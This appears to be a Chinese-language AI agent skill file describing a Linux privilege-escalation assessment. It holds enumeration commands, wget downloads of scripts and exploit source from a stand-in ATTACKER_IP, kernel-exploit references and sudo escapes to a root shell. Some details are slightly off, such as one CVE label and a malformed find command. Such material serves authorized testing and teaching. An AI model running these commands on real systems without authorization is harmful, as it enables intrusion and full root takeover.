关于
对 Linux 系统执行系统性权限提升评估,识别和利用错误配置、脆弱服务和安全弱点,实现从低权限用户到 root 级别控制的提升。
name: linux-privilege-escalation description: "在Linux系统上执行系统化的权限提升评估,识别和利用配置错误、易受攻击的服务和安全弱点,实现从低权限用户访问到root级别控制的提升。" risk: offensive source: community author: zebbern date_added: "2026-02-27"
仅限授权使用:此技能仅用于授权的安全评估、防御验证或受控教育环境。
Linux 权限提升
目的
在Linux系统上执行系统化的权限提升评估,识别和利用配置错误、易受攻击的服务和安全弱点,实现从低权限用户访问到root级别控制的提升。此技能支持对内核漏洞、sudo配置错误、SUID二进制文件、cron作业、capabilities、PATH劫持和NFS弱点的全面枚举和利用。
输入 / 前提条件
所需访问权限
- 目标Linux系统的低权限shell访问
- 能够执行命令(交互式或半交互式shell)
- 用于反向shell连接的网络访问(如需要)
- 用于托管载荷和接收shell的攻击机
技术要求
- 理解Linux文件系统权限和所有权
- 熟悉常见Linux工具和脚本
- 了解内核版本及相关漏洞
- 基本理解编译(gcc)以用于自定义利用
推荐工具
- LinPEAS、LinEnum 或 Linux Smart Enumeration 脚本
- Linux Exploit Suggester (LES)
- GTFOBins 二进制利用参考
- John the Ripper 或 Hashcat 用于密码破解
- Netcat 或类似工具用于反向shell
输出 / 交付物
主要输出
- 目标系统的root shell访问
- 权限提升路径文档
- 系统枚举发现报告
- 修复建议
证据文件
- 成功权限提升的截图
- 证明root访问的命令输出日志
- 已识别的漏洞详情
- 被利用的配置文件
核心工作流
阶段 1:系统枚举
基本系统信息
收集基本系统详情用于漏洞研究:
# Hostname and system role
hostname
# Kernel version and architecture
uname -a
# Detailed kernel information
cat /proc/version
# Operating system details
cat /etc/issue
cat /etc/*-release
# Architecture
arch
用户和权限枚举
# Current user context
whoami
id
# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
# Users with home directories
cat /etc/passwd | grep home
# Group memberships
groups
# Other logged-in users
w
who
网络信息
# Network interfaces
ifconfig
ip addr
# Routing table
ip route
# Active connections
netstat -antup
ss -tulpn
# Listening services
netstat -l
进程和服务枚举
# All running processes
ps aux
ps -ef
# Process tree view
ps axjf
# Services running as root
ps aux | grep root
环境变量
# Full environment
env
# PATH variable (for hijacking)
echo $PATH
阶段 2:自动化枚举
部署自动化脚本进行全面枚举:
# LinPEAS: download first, inspect the script, then execute only in an authorized lab
curl -L -o linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
less linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# LinEnum
./LinEnum.sh -t
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./les.sh
将脚本传输到目标系统:
# On attacker machine
python3 -m http.server 8000
# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
阶段 3:内核漏洞利用
识别内核版本
uname -r
cat /proc/version
搜索漏洞利用
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh
# Manual search on exploit-db
searchsploit linux kernel [version]
常见内核漏洞
| 内核版本 | 漏洞利用 | CVE | |---------------|---------|-----| | 2.6.x - 3.x | Dirty COW | CVE-2016-5195 | | 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 | | 5.8+ | Dirty Pipe | CVE-2022-0847 |
编译和执行
# Transfer exploit source
wget http://ATTACKER_IP/exploit.c
# Compile on target
gcc exploit.c -o exploit
# Execute
./exploit
阶段 4:Sudo 利用
枚举 Sudo 权限
sudo -l
GTFOBins Sudo 利用
参考 https://gtfobins.github.io 获取利用命令:
# Example: vim with sudo
sudo vim -c ':!/bin/bash'
# Example: find with sudo
sudo find . -exec /bin/sh ; -quit
# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'
# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'
限制
- 仅在任务明确匹配上述范围时使用此技能。
- 不要将输出视为特定环境验证、测试或专家审查的替代品。
- 如果缺少必要的输入、权限、安全边界或成功标准,请停下来要求澄清。
兼容工具
Claude CodeCursor
标签
安全
